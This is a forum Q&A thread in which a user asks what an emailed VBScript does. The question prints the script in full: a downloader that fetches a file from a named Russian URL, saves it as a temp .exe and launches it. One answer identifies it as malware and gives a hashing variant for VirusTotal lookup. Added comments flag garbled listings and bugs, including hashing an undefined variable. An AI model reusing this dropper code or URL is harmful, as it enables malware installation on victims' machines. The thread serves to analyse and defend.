vbscript - Possible Extortion of Data -
Someone sent me an email containing a VBS script, and I don't know VBS.
I'm guessing it is a swindle to extort data from me, but I can't tell what data. Can someone please explain what the script does?
' NOTE(review): the listing is collapsed onto one line on the page and appears to have lost
' some keywords — "objhttp.send = 1 lenb(...)" followed later by "next" presumably reads
' "objhttp.send" and then "for i = 1 to lenb(...)" in the original. Tokens are reproduced
' exactly as found; only comments have been added.
'
' httpupload: fetches the body of myurl over HTTP, writes it byte by byte into a newly
' created file in the temporary folder whose name ends in ".exe", and then executes that
' file via WScript.Shell.Run. In other words, a downloader that drops and launches a binary.
' The mypath argument is ignored: it is overwritten with the generated temp path below.
sub httpupload( myurl, mypath )
dim objshell
set objshell = wscript.createobject( "wscript.shell" )   ' only used for the .run call at the end
dim i, objfile, objfso, objhttp, strfile, strmsg          ' strfile and strmsg are declared but never used
const forreading = 1, forwriting = 2, forappending = 8     ' declared but never used
set objfso = createobject( "scripting.filesystemobject" )
const temporaryfolder = 2                                   ' GetSpecialFolder selector; named for the temp folder
set tfolder = objfso.getspecialfolder(temporaryfolder)
tname = objfso.gettempname + ".exe"                         ' random temp file name, forced to an .exe extension
mypath = tfolder + "/" + tname                              ' caller-supplied mypath is discarded here
set objfile = tfolder.createtextfile(tname)                 ' a TextStream, not a binary stream (see write below)
set objhttp = createobject( "winhttp.winhttprequest.5.1" )
objhttp.open "get", myurl, false                            ' synchronous GET
objhttp.send = 1 lenb( objhttp.responsebody )               ' garbled on the page: sends the request, then loops over the response bytes — TODO confirm against the original file
objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )   ' one byte per iteration; writing through a TextStream may not round-trip bytes above 127 — TODO confirm
next
objfile.close( )
objshell.run(mypath)                                        ' launches the file that was just written
set objshell = nothing
end sub
' Invocation: the URL is the remote source of the payload; the second argument is ignored.
httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
As the other answer stated, it's a virus. It downloads binary data, writes it to an .exe, and fires it off. Modify the code as shown below. ... Delete the email and forget about it. I know not everyone is as crazy as I am when it comes to finding viruses in the wild; I hoard these things and study them.
I've amended the script so that it provides an MD5 hash and a SHA256 hash that are searchable on VirusTotal, and deletes the file afterwards. You need to re-append the `httpupload ...` line to download the file; as you can see below, I removed the line attempting to use the .run method.
' Invocation line referred to above: the URL is the remote source the sub fetches.
' The second argument is ignored — httpupload overwrites mypath with its own temp path.
httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
The link provided is cut off. If you still have the VBS file, remove the whole section from `sub httpupload` through `end sub` right before it... replace the entire content of the VBS file except for the line mentioned above.
' NOTE(review): this listing is collapsed onto one line on the page and appears to have lost
' some keywords ("for ... to", "then", "with"); the loop headers in httpupload and bytestohex
' and the two "end" lines in bytestobase64/getbytes read as "end with" in the original,
' presumably. Tokens are reproduced exactly as found; only comments have been added.
'
' Analysis variant of httpupload: downloads the body of myurl into a temp file and prints
' its MD5 and SHA256 hex digests instead of executing it. Points a reviewer would want fixed:
'   * the digests are computed over spath, which is not defined in this sub — the file that
'     was just written is mypath, so the hashes as written are not of the downloaded file;
'   * no deletion of the temp file appears in this listing, although the text above says
'     the file is deleted afterwards;
'   * the temp file still gets a ".exe" name even though nothing here runs it — a neutral
'     extension would avoid accidental execution of a downloaded sample;
'   * objshell is created but no longer used once the .run line is gone.
sub httpupload( myurl, mypath )
dim objshell
set objshell = wscript.createobject( "wscript.shell" )   ' unused in this variant
dim i, objfile, objfso, objhttp, strfile, strmsg          ' strfile and strmsg are never used
const forreading = 1, forwriting = 2, forappending = 8     ' declared but never used
set objfso = createobject( "scripting.filesystemobject" )
const temporaryfolder = 2                                   ' GetSpecialFolder selector; named for the temp folder
set tfolder = objfso.getspecialfolder(temporaryfolder)
tname = objfso.gettempname + ".exe"                         ' random temp name with a forced .exe extension
mypath = tfolder + "/" + tname                              ' caller-supplied mypath is discarded
set objfile = tfolder.createtextfile(tname)                 ' TextStream, not a binary stream
set objhttp = createobject( "winhttp.winhttprequest.5.1" )
objhttp.open "get", myurl, false                            ' synchronous GET
objhttp.send = 1 lenb( objhttp.responsebody )               ' garbled on the page: send, then loop over the response bytes — TODO confirm against the original
objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )   ' one byte per iteration; TextStream writes may not round-trip bytes above 127 — TODO confirm
next
objfile.close( )
' BUG(review): spath is undefined here; the intent is evidently to hash mypath (the file just written).
wscript.echo " md5hash: " & md5hash(spath) & vbcrlf & " sha256hash: " & sha256hash(spath)
set objshell = nothing
end sub
' md5hash: hex MD5 digest of the file at spath.
function md5hash(spath)
md5hash = bytestohex(md5hashbytes(getbytes(spath)))
end function
' sha256hash: hex SHA-256 digest of the file at spath.
function sha256hash(spath)
sha256hash = bytestohex(sha256hashbytes(getbytes(spath)))
end function
' md5hashbytes: raw MD5 digest of a byte array, via the .NET provider exposed through COM.
function md5hashbytes(abytes)
set objmd5 = createobject("system.security.cryptography.md5cryptoserviceprovider")
objmd5.initialize()
md5hashbytes = objmd5.computehash_2( (abytes) )
end function
' sha256hashbytes: raw SHA-256 digest of a byte array, via the .NET SHA256Managed class through COM.
function sha256hashbytes(abytes)
'set objsha256 = createobject("system.security.cryptography.md5cryptoserviceprovider")
set objsha256 = createobject("system.security.cryptography.sha256managed")
objsha256.initialize()
sha256hashbytes = objsha256.computehash_2( (abytes) )
end function
' stringtoutfbytes: UTF-8 encodes a string to a byte array. Not called by anything in this listing.
function stringtoutfbytes(astring)
set utf8 = createobject("system.text.utf8encoding")
stringtoutfbytes = utf8.getbytes_4(astring)
end function
' bytestohex: lowercase/uppercase-as-Hex() two-digit hex string per byte, zero-padded.
function bytestohex(abytes)
x = 1 lenb(abytes)                                          ' garbled on the page: presumably "for x = 1 to lenb(abytes)"
hexstr=hex(ascb(midb((abytes), x, 1)))
if len(hexstr) = 1 hexstr ="0" & hexstr                     ' garbled on the page: presumably "if ... then ..."; pads single-digit values
bytestohex=bytestohex & hexstr
next
end function
' bytestobase64: Base64 encodes a byte array using an MSXML element. Not called by anything in this listing.
function bytestobase64(varbytes)
createobject("msxml2.domdocument").createelement("b64")     ' garbled on the page: presumably "with createobject(...)...end with"
.datatype = "bin.base64"
.nodetypedvalue = varbytes
bytestobase64 = .text
end
end function
' getbytes: reads the whole file at spath as a binary byte array via ADODB.Stream (type 1 = binary).
function getbytes(spath)
createobject("adodb.stream")                                ' garbled on the page: presumably "with createobject(...)...end with"
.type = 1
.open
.loadfromfile spath
.position = 0
getbytes = .read
.close
end
end function